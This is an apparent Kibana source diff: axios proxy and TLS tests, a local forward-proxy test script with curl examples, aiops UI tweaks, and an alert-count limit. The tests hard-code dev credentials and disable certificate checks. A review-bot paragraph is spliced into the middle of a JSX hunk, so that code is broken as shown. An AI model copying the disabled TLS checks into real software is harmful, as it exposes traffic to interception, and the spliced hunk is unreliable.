Auth = 'elastic:changeme'; +const AuthB64 = Buffer.from(Auth).toString('base64'); + +// eslint-disable-next-line @typescript-eslint/no-var-requires +const AxiosDefaultsAadapter = 
require('axios/lib/adapters/http'); + +const ServerResponse = 'A unique response returned by the server!'; + +describe('axios connections', () => { + let testServer: http.Server | https.Server | null; + // eslint-disable-next-line @typescript-eslint/no-explicit-any + let savedAxiosDefaultsAdapter: any; + + beforeEach(() => { + // needed to prevent the dreaded Error: Cross origin http://localhost forbidden + // see: https://github.com/axios/axios/issues/1754#issuecomment-572778305 + savedAxiosDefaultsAdapter = axios.defaults.adapter; + axios.defaults.adapter = AxiosDefaultsAadapter; + }); + + afterEach(() => { + axios.defaults.adapter = savedAxiosDefaultsAdapter; + }); + + beforeEach(() => { + jest.resetAllMocks(); + }); + + afterEach(() => { + testServer?.close(); + testServer = null; + }); + + describe('http', () => { + test('it works', async () => { + const { url, server } = await createServer({ useHttps: false }); + testServer = server; + + const configurationUtilities = getACUfromConfig(); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + }); + + describe('https', () => { + test('it fails with self-signed cert and no overrides', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig(); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it works with verificationMode "none" config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + ssl: { + verificationMode: 'none', + }, + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it 
works with verificationMode "none" for custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { verificationMode: 'none' } }], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it works with ca in custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: CA } }], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it fails with incorrect ca in custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: KIBANA_CRT } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it works with incorrect ca in custom host config but verificationMode "none"', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [ + { + url, + ssl: { + certificateAuthoritiesData: CA, + verificationMode: 'none', + }, + }, + ], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it works with incorrect ca in custom host config but verificationMode config "full"', async () => { + const { url, 
server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + ssl: { + verificationMode: 'none', + }, + customHostSettings: [ + { + url, + ssl: { + certificateAuthoritiesData: CA, + }, + }, + ], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); + + test('it fails with no matching custom host settings', async () => { + const { url, server } = await createServer({ useHttps: true }); + const otherUrl = 'https://example.com'; + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url: otherUrl, ssl: { verificationMode: 'none' } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it fails cleanly with a garbage CA 1', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: 'garbage' } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it fails cleanly with a garbage CA 2', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const ca = '-----BEGIN CERTIFICATE-----\ngarbage\n-----END CERTIFICATE-----\n'; + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: ca } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + }); + + // targetHttps, proxyHttps, and proxyAuth should all range over [false, true], but + // currently the true versions are 
not passing + describe(`proxy`, () => { + for (const targetHttps of [false]) { + for (const targetAuth of [false, true]) { + for (const proxyHttps of [false]) { + for (const proxyAuth of [false]) { + const targetLabel = testLabel('target', targetHttps, targetAuth); + const proxyLabel = testLabel('proxy', proxyHttps, proxyAuth); + const testName = `${targetLabel} :: ${proxyLabel}`; + + const opts = { targetHttps, targetAuth, proxyHttps, proxyAuth }; + + test(`basic; ${testName}`, async () => await basicProxyTest(opts)); + + if (targetAuth) { + test(`wrong target password; ${testName}`, async () => + await wrongTargetPasswordProxyTest(opts)); + + test(`missing target password; ${testName}`, async () => + await missingTargetPasswordProxyTest(opts)); + } + + if (proxyAuth) { + test(`wrong proxy password; ${testName}`, async () => + await wrongProxyPasswordProxyTest(opts)); + + test(`missing proxy password; ${testName}`, async () => + await missingProxyPasswordProxyTest(opts)); + } + + if (targetHttps) { + test(`missing CA; ${testName}`, async () => + await missingCaProxyTest(opts)); + + test(`rejectUnauthorized target; ${testName}`, async () => + await rejectUnauthorizedTargetProxyTest(opts)); + + test(`custom CA target; ${testName}`, async () => + await customCAProxyTest(opts)); + + test(`verModeNone target; ${testName}`, async () => + await verModeNoneTargetProxyTest(opts)); + } + } + } + } + } + }); +}); + +async function basicProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); +} + +async function wrongTargetPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, 
async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const wrongUrl = manglePassword(target.url); + const res = await request({ ...axiosDefaults, url: wrongUrl, configurationUtilities: acu }); + expect(res.status).toBe(403); + }); +} + +async function missingTargetPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const anonUrl = removePassword(target.url); + const res = await request({ ...axiosDefaults, url: anonUrl, configurationUtilities: acu }); + expect(res.status).toBe(401); + }); +} + +async function wrongProxyPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const wrongUrl = manglePassword(proxy.url); + const acu = getACUfromConfig({ + proxyUrl: wrongUrl, + ssl: { verificationMode: 'none' }, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.message).toMatch('407'); + } + }); +} + +async function missingProxyPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const anonUrl = removePassword(proxy.url); + const acu = getACUfromConfig({ + proxyUrl: anonUrl, + ssl: { verificationMode: 'none' }, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.message).toMatch('407'); + } + }); +} + +async function missingCaProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async 
(target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.code).toEqual('UNABLE_TO_VERIFY_LEAF_SIGNATURE'); + } + }); +} + +async function rejectUnauthorizedTargetProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + rejectUnauthorized: false, + customHostSettings: [{ url: target.url, ssl: { verificationMode: 'none' } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); +} + +async function customCAProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); +} + +async function verModeNoneTargetProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + customHostSettings: [{ url: target.url, ssl: { verificationMode: 'none' } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + expect(res.data).toBe(ServerResponse); + }); +} + +interface RunTestOptions { + targetHttps: boolean; + targetAuth: boolean; + proxyHttps: boolean; + proxyAuth: boolean; +} + +type AxiosParams = Parameters[0]; + +type Test = ( + target: CreateServerResult, + proxy: CreateProxyResult, + axiosDefaults: AxiosParams +) => Promise; + +async function 
runWithSetup(opts: RunTestOptions, fn: Test) { + const target = await createServer({ + useHttps: opts.targetHttps, + requireAuth: opts.targetAuth, + }); + + const proxy = await createProxy({ + useHttps: opts.proxyHttps, + requireAuth: opts.proxyAuth, + }); + + const axiosDefaults = { + axios, + logger, + validateStatus, + url: target.url, + configurationUtilities: getACUfromConfig({ + proxyUrl: proxy.url, + }), + }; + + try { + await fn(target, proxy, axiosDefaults); + } catch (err) { + expect(err).toBeUndefined(); + } + + target.server.close(); + proxy.server.close(); +} + +function testLabel(type: string, tls: boolean, auth: boolean) { + return `${type} https ${tls ? 'X' : '-'} auth ${auth ? 'X' : '-'}`; +} + +function validateStatus(status: number) { + return true; +} + +function manglePassword(url: string) { + const parsed = new URL(url); + parsed.password = `nope-${parsed.password}-nope`; + return parsed.toString(); +} + +function removePassword(url: string) { + const parsed = new URL(url); + parsed.username = ''; + parsed.password = ''; + return parsed.toString(); +} + +const TlsOptions = { + cert: KIBANA_CRT, + key: KIBANA_KEY, +}; + +interface CreateServerOptions { + useHttps: boolean; + requireAuth?: boolean; +} + +interface CreateServerResult { + url: string; + server: http.Server | https.Server; +} + +async function createServer(options: CreateServerOptions): Promise { + const { useHttps, requireAuth = false } = options; + const port = await getPort(); + const url = `http${useHttps ? 's' : ''}://${requireAuth ? 
`${Auth}@` : ''}localhost:${port}`; + + function requestHandler(req: http.IncomingMessage, res: http.ServerResponse) { + if (requireAuth) { + const auth = req.headers.authorization; + if (auth == null) { + res.setHeader('WWW-Authenticate', 'Basic'); + res.writeHead(401); + res.end('authorization required'); + return; + } + if (auth !== `Basic ${AuthB64}`) { + res.writeHead(403); + res.end('not authorized'); + return; + } + } + + res.writeHead(200); + res.end(ServerResponse); + } + + let server: http.Server | https.Server; + if (!useHttps) { + server = http.createServer(requestHandler); + } else { + server = https.createServer(TlsOptions, requestHandler); + } + server.unref(); + + const readySignal = createReadySignal(); + server.listen(port, 'localhost', () => { + readySignal.signal({ url, server }); + }); + + return readySignal.wait(); +} + +interface CreateProxyOptions { + useHttps: boolean; + requireAuth?: boolean; +} + +interface CreateProxyResult { + url: string; + server: http.Server | https.Server; +} + +type AuthenticateCallback = (err: null | Error, authenticated: boolean) => void; + +interface IAuthenticate { + authenticate(req: http.IncomingMessage, callback: AuthenticateCallback): void; +} + +async function createProxy(options: CreateProxyOptions): Promise { + const { useHttps, requireAuth = false } = options; + const port = await getPort(); + const url = getUrl(useHttps, requireAuth, port); + let proxyServer: http.Server | https.Server; + + if (!useHttps) { + proxyServer = http.createServer(); + } else { + proxyServer = https.createServer(TlsOptions); + } + proxyServer.unref(); + + proxySetup(proxyServer); + if (requireAuth) { + (proxyServer as unknown as IAuthenticate).authenticate = (req, callback) => { + const auth = req.headers['proxy-authorization']; + callback(null, auth === `Basic ${AuthB64}`); + }; + } + + const readySignal = createReadySignal(); + + proxyServer.listen(port, 'localhost', () => { + readySignal.signal({ server: proxyServer, url 
}); + }); + + return readySignal.wait(); +} + +function getUrl(useHttps: boolean, requiresAuth: boolean, port: number) { + return `http${useHttps ? 's' : ''}://${requiresAuth ? `${Auth}@` : ''}localhost:${port}`; +} + +const BaseActionsConfig: ActionsConfig = { + allowedHosts: ['*'], + enabledActionTypes: ['*'], + preconfiguredAlertHistoryEsIndex: false, + preconfigured: {}, + proxyUrl: undefined, + proxyHeaders: undefined, + proxyRejectUnauthorizedCertificates: true, + ssl: { + proxyVerificationMode: 'full', + verificationMode: 'full', + }, + proxyBypassHosts: undefined, + proxyOnlyHosts: undefined, + rejectUnauthorized: true, + maxResponseContentLength: ByteSizeValue.parse('1mb'), + responseTimeout: momentDuration(1000 * 30), + customHostSettings: undefined, + cleanupFailedExecutionsTask: { + enabled: true, + cleanupInterval: schema.duration().validate('5m'), + idleInterval: schema.duration().validate('1h'), + pageSize: 100, + }, +}; + +function getACUfromConfig(config: Partial = {}): ActionsConfigurationUtilities { + const resolvedConfig = resolveCustomHosts(logger, { ...BaseActionsConfig, ...config }); + return getActionsConfigurationUtilities(resolvedConfig); +} diff --git a/x-pack/plugins/actions/server/manual_tests/forward_proxy.js b/x-pack/plugins/actions/server/manual_tests/forward_proxy.js index e562d3edabdb6..17475866b3111 100644 --- a/x-pack/plugins/actions/server/manual_tests/forward_proxy.js +++ b/x-pack/plugins/actions/server/manual_tests/forward_proxy.js 
@@ -6,108 +6,151 @@ */ /* -This module implements two forward http proxies, http on 8080 and https on 8443, -which can be used with the config xpack.actions.proxyUrl to emulate customers -using forward proxies with Kibana actions. You can use either the http or https -versions, both can forward proxy http and https traffic: - - xpack.actions.proxyUrl: http://localhost:8080 - OR - xpack.actions.proxyUrl: https://localhost:8443 +Starts http and https proxies to use to test actions within Kibana or with curl. -When using the https-based version, you may need to set the following option -as well: +Assumes you have elasticsearch running on https://elastic:changeme@localhost:9200, +otherwise expect 500 responses from those requests. All other requests should +work as expected. - xpack.actions.rejectUnauthorized: false +# start 4 proxies: -If the server you are connecting to via the proxy is https and has self-signed -certificates, you'll also need to set +node x-pack/plugins/actions/server/manual_tests/forward_proxy.js http-8080-open http-8081-auth https-8443-open https-8444-auth - xpack.actions.proxyRejectUnauthorizedCertificates: false -*/ +# issue some requests through the proxies -const HTTP_PORT = 8080; -const HTTPS_PORT = 8443; +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8080 http://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8080 https://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8443 http://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8443 https://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8080 https://elastic:changeme@localhost:9200; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8443 https://elastic:changeme@localhost:9200; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8081 --proxy-user elastic:changeme 
http://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8081 --proxy-user elastic:changeme https://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8444 --proxy-user elastic:changeme http://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8444 --proxy-user elastic:changeme https://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8081 --proxy-user elastic:changeme https://elastic:changeme@localhost:9200; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8444 --proxy-user elastic:changeme https://elastic:changeme@localhost:9200; \ +echo done - you should run all the lines above as one command -// starts http and https proxies to use to test actions within Kibana +*/ const fs = require('fs'); -const net = require('net'); -const url = require('url'); +const path = require('path'); const http = require('http'); const https = require('https'); -const httpProxy = require('http-proxy'); +const proxySetup = require('proxy'); + +const PROGRAM = path.basename(__filename).replace(/.js$/, ''); +const CertDir = path.resolve(__dirname, '../../../../../packages/kbn-dev-utils/certs'); -const httpsOptions = { - key: fs.readFileSync('packages/kbn-dev-utils/certs/kibana.key', 'utf8'), - cert: fs.readFileSync('packages/kbn-dev-utils/certs/kibana.crt', 'utf8'), +const Auth = 'elastic:changeme'; +const AuthB64 = Buffer.from(Auth).toString('base64'); + +const HttpsOptions = { + key: fs.readFileSync(path.join(CertDir, 'kibana.key'), 'utf8'), + cert: fs.readFileSync(path.join(CertDir, 'kibana.crt'), 'utf8'), }; -const proxy = httpProxy.createServer(); +async function main() { + const args = process.argv.slice(2); + if (args.length === 0) { + help(); + process.exit(1); + } -createServer('http', HTTP_PORT); -createServer('https', HTTPS_PORT); + const specs = args.map(argToSpec); + for (const spec of specs) { + const 
{ protocol, port, auth } = spec; + createServer(protocol, port, auth); + } +} -function createServer(protocol, port) { - let httpServer; +/** @type { (protocol: string, port: number, auth: boolean) => Promise } */ +async function createServer(protocol, port, auth) { + let proxyServer; if (protocol === 'http') { - httpServer = http.createServer(); + proxyServer = http.createServer(); } else { - httpServer = https.createServer(httpsOptions); + proxyServer = https.createServer(HttpsOptions); } - httpServer.on('request', httpRequest); - httpServer.on('connect', httpsRequest); - httpServer.listen(port); - log(`proxy server started: ${protocol}:/localhost:${port}`); - - // handle http requests - function httpRequest(req, res) { - log(`${protocol} server: request for: ${req.url}`); - const parsedUrl = url.parse(req.url); - if (parsedUrl.hostname == null) { - res.writeHead(200, { 'Content-Type': 'text/plain' }); - res.end('this is a proxy server'); - return; - } - const target = parsedUrl.protocol + '//' + parsedUrl.hostname; - proxy.web(req, res, { target: target, secure: false }); + proxySetup(proxyServer); + + let authLabel = ''; + if (auth) { + authLabel = `${Auth}@`; + proxyServer.authenticate = (req, callback) => { + const auth = req.headers['proxy-authorization']; + callback(null, auth === `Basic ${AuthB64}`); + }; } - // handle https requests - // see: https://nodejs.org/dist/latest-v14.x/docs/api/http.html#http_event_connect - function httpsRequest(req, socket, head) { - log(`${protocol} proxy server: request for target: https://${req.url}`); - const serverUrl = url.parse('https://' + req.url); - const serverSocket = net.connect(serverUrl.port, serverUrl.hostname, () => { - socket.write('HTTP/1.1 200 Connection Established\r\nProxy-agent: Node-Proxy\r\n\r\n'); - serverSocket.write(head); - serverSocket.pipe(socket); - socket.pipe(serverSocket); - }); - socket.on('error', (err) => { - log(`error on socket to proxy: ${err}`); - socket.destroy(); - 
serverSocket.destroy(); - }); - serverSocket.on('error', (err) => { - log(`error on socket to target: ${err}`); - socket.destroy(); - serverSocket.destroy(); - }); + const serverLabel = `${protocol}://${authLabel}localhost:${port}`; + proxyServer.listen(port, 'localhost', () => { + console.log(`proxy server started on ${serverLabel}`); + }); +} + +/* convert 'proto-port-auth' into object with shape shown below */ +/** @type { (arg: string) => void | { protocol: string, port: number, auth: boolean } } */ +function argToSpec(arg) { + const parts = arg.split('-'); + if (parts.length < 2) { + return logError(`invalid spec: ${arg}`); } + + const [protocol, portString, authString] = parts; + + if (!protocol) return logError(`empty protocol in '${arg}'`); + if (protocol !== 'http' && protocol !== 'https') + return logError(`invalid protocol in '${arg}': '${protocol}'`); + + if (!portString) return logError(`empty port in '${arg}'`); + const port = Number.parseInt(portString, 10); + if (isNaN(port)) return logError(`invalid port in '${arg}': ${portString}`); + + let auth; + if (!authString) { + auth = false; + } else { + if (authString !== 'auth' && authString !== 'open') + return logError(`invalid auth in '${arg}': '${authString}'`); + auth = authString === 'auth'; + } + + return { protocol, port, auth }; } +/** @type { (message: string) => void } */ function log(message) { console.log(`${new Date().toISOString()} - ${message}`); } -/* -Test with: +/** @type { (message: string) => void } */ +function logError(message) { + log(message); + process.exit(1); +} -curl -v -k --proxy-insecure -x http://127.0.0.1:8080 http://www.google.com -curl -v -k --proxy-insecure -x http://127.0.0.1:8080 https://www.google.com -curl -v -k --proxy-insecure -x https://127.0.0.1:8443 http://www.google.com -curl -v -k --proxy-insecure -x https://127.0.0.1:8443 https://www.google.com -*/ +main(); + +function help() { + console.log(`${PROGRAM} - create http proxies to test connectors with`); + 
console.log(`usage:`); + console.log(` ${PROGRAM} spec spec spec ...`); + console.log(``); + console.log(`options:`); + console.log(` - none yet`); + console.log(``); + console.log(`parameters:`); + console.log(` spec: spec is a 3-part token, separated by '-' chars`); + console.log(` [proto]-[port]-[auth]`); + console.log(` proto - 'http' or 'https'`); + console.log(` port - port to open the proxy on`); + console.log(` auth - 'auth' or 'open' (auth expects user/pass elastic:change)`); + console.log(``); + console.log(`example:`); + console.log(` ${PROGRAM} {options} http-8080-open https-8443-open`); + console.log(` `); +} diff --git a/x-pack/plugins/aiops/public/components/document_count_content/document_count_chart/document_count_chart.tsx b/x-pack/plugins/aiops/public/components/document_count_content/document_count_chart/document_count_chart.tsx index 79f5494b419ca..4a7d4dd583de5 100644 --- a/x-pack/plugins/aiops/public/components/document_count_content/document_count_chart/document_count_chart.tsx +++ b/x-pack/plugins/aiops/public/components/document_count_content/document_count_chart/document_count_chart.tsx @@ -33,6 +33,15 @@ import { useAiOpsKibana } from '../../../kibana_context'; import { BrushBadge } from './brush_badge'; +declare global { + interface Window { + /** + * Flag used to enable debugState on elastic charts + */ + _echDebugStateFlag?: boolean; + } +} + export interface DocumentCountChartPoint { time: number | string; value: number; @@ -271,7 +280,7 @@ export const DocumentCountChart: FC = ({ return ( <> {isBrushVisible && ( -
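Review bot: The help text at the end of the hunk documents the proxy credentials as `elastic:change`, but `Auth` is `'elastic:changeme'` and `authenticate` compares the header against `Basic ${AuthB64}` derived from it, so anyone following the help gets 407 responses; change the line to `auth - 'auth' or 'open' (auth expects user/pass elastic:changeme)`. `argToSpec` also accepts any port that `parseInt` does not reject, so `0`, `70000` or `8080abc` pass validation and only fail later in `listen`; replace the `isNaN` check with `const port = Number(portString);` followed by `if (!Number.isInteger(port) || port < 1 || port > 65535) return logError(...)`. Extra `-`-separated parts beyond the third are silently ignored, so a typo such as `http-8080-auth-x` starts an authenticated proxy without complaint; a `parts.length > 3` rejection would catch it. The listeners bind to `localhost`, so the hard-coded dev credentials are only reachable locally, which is appropriate for a manual test helper.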
+
= ({ }} theme={chartTheme} baseTheme={chartBaseTheme} + debugState={window._echDebugStateFlag ?? false} /> = ({ {clearSelectionLabel} diff --git a/x-pack/plugins/aiops/public/components/explain_log_rate_spikes/explain_log_rate_spikes_analysis.tsx b/x-pack/plugins/aiops/public/components/explain_log_rate_spikes/explain_log_rate_spikes_analysis.tsx index c9b74a634001e..4c99c3bb9279d 100644 --- a/x-pack/plugins/aiops/public/components/explain_log_rate_spikes/explain_log_rate_spikes_analysis.tsx +++ b/x-pack/plugins/aiops/public/components/explain_log_rate_spikes/explain_log_rate_spikes_analysis.tsx @@ -112,7 +112,7 @@ export const ExplainLogRateSpikesAnalysis: FC const showSpikeAnalysisTable = data?.changePoints.length > 0; return ( - <> +
{!isRunning && !showSpikeAnalysisTable && ( selectedChangePoint={selectedChangePoint} /> )} - +
); }; diff --git a/x-pack/plugins/aiops/public/components/spike_analysis_table/spike_analysis_table.tsx b/x-pack/plugins/aiops/public/components/spike_analysis_table/spike_analysis_table.tsx index 4b7d2bb1d0597..6ae778e48e3e0 100644 --- a/x-pack/plugins/aiops/public/components/spike_analysis_table/spike_analysis_table.tsx +++ b/x-pack/plugins/aiops/public/components/spike_analysis_table/spike_analysis_table.tsx @@ -56,6 +56,7 @@ export const SpikeAnalysisTable: FC = ({ const columns: Array> = [ { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnFieldName', field: 'fieldName', name: i18n.translate( 'xpack.aiops.correlations.failedTransactions.correlationsTable.fieldNameLabel', @@ -64,6 +65,7 @@ export const SpikeAnalysisTable: FC = ({ sortable: true, }, { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnFieldValue', field: 'fieldValue', name: i18n.translate( 'xpack.aiops.correlations.failedTransactions.correlationsTable.fieldValueLabel', @@ -73,6 +75,7 @@ export const SpikeAnalysisTable: FC = ({ sortable: true, }, { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnLogRate', width: NARROW_COLUMN_WIDTH, field: 'pValue', name: ( @@ -105,6 +108,7 @@ export const SpikeAnalysisTable: FC = ({ sortable: false, }, { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnPValue', width: NARROW_COLUMN_WIDTH, field: 'pValue', name: ( @@ -131,6 +135,7 @@ export const SpikeAnalysisTable: FC = ({ sortable: true, }, { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnImpact', width: NARROW_COLUMN_WIDTH, field: 'pValue', name: ( @@ -210,6 +215,7 @@ export const SpikeAnalysisTable: FC = ({ return ( = ({ sorting={sorting as EuiTableSortingType} rowProps={(changePoint) => { return { + 'data-test-subj': `aiopsSpikeAnalysisTableRow row-${changePoint.fieldName}-${changePoint.fieldValue}`, onClick: () => { if (onPinnedChangePoint) { onPinnedChangePoint(changePoint); 
diff --git a/x-pack/plugins/alerting/common/rule.ts b/x-pack/plugins/alerting/common/rule.ts index cfd93f475b883..1514de7b95209 100644 --- a/x-pack/plugins/alerting/common/rule.ts +++ b/x-pack/plugins/alerting/common/rule.ts @@ -45,6 +45,7 @@ export enum RuleExecutionStatusErrorReasons { export enum RuleExecutionStatusWarningReasons { MAX_EXECUTABLE_ACTIONS = 'maxExecutableActions', + MAX_ALERTS = 'maxAlerts', } export interface RuleExecutionStatus { diff --git a/x-pack/plugins/alerting/server/alert/create_alert_factory.test.ts b/x-pack/plugins/alerting/server/alert/create_alert_factory.test.ts index c9505d5f838e2..9b8b95e8af36f 100644 --- a/x-pack/plugins/alerting/server/alert/create_alert_factory.test.ts +++ b/x-pack/plugins/alerting/server/alert/create_alert_factory.test.ts @@ -29,6 +29,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, }); const result = alertFactory.create('1'); expect(result).toMatchInlineSnapshot(` @@ -51,6 +52,7 @@ describe('createAlertFactory()', () => { '1': alert, }, logger, + maxAlerts: 1000, }); const result = alertFactory.create('1'); expect(result).toMatchInlineSnapshot(` @@ -73,6 +75,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts, logger, + maxAlerts: 1000, }); alertFactory.create('1'); expect(alerts).toMatchInlineSnapshot(` 
@@ -85,10 +88,30 @@ describe('createAlertFactory()', () => { `); }); + test('throws error and sets flag when more alerts are created than allowed', () => { + const alertFactory = createAlertFactory({ + alerts: {}, + logger, + maxAlerts: 3, + }); + + expect(alertFactory.hasReachedAlertLimit()).toBe(false); + alertFactory.create('1'); + alertFactory.create('2'); + alertFactory.create('3'); + + expect(() => { + alertFactory.create('4'); + }).toThrowErrorMatchingInlineSnapshot(`"Rule reported more than 3 alerts."`); + + expect(alertFactory.hasReachedAlertLimit()).toBe(true); + }); + test('throws error when creating alerts after done() is called', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, }); const result = alertFactory.create('1'); expect(result).toEqual({ @@ -127,6 +150,7 @@ describe('createAlertFactory()', () => { alerts: {}, logger, canSetRecoveryContext: true, + maxAlerts: 1000, }); const result = alertFactory.create('1'); expect(result).toEqual({ @@ -149,6 +173,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, canSetRecoveryContext: true, }); const result = alertFactory.create('1'); @@ -171,6 +196,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, canSetRecoveryContext: true, }); const result = alertFactory.create('1'); @@ -192,6 +218,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, canSetRecoveryContext: false, }); const result = alertFactory.create('1'); diff --git a/x-pack/plugins/alerting/server/alert/create_alert_factory.ts b/x-pack/plugins/alerting/server/alert/create_alert_factory.ts index 5a9dad5cdada8..158926a19d782 100644 --- a/x-pack/plugins/alerting/server/alert/create_alert_factory.ts +++ b/x-pack/plugins/alerting/server/alert/create_alert_factory.ts 
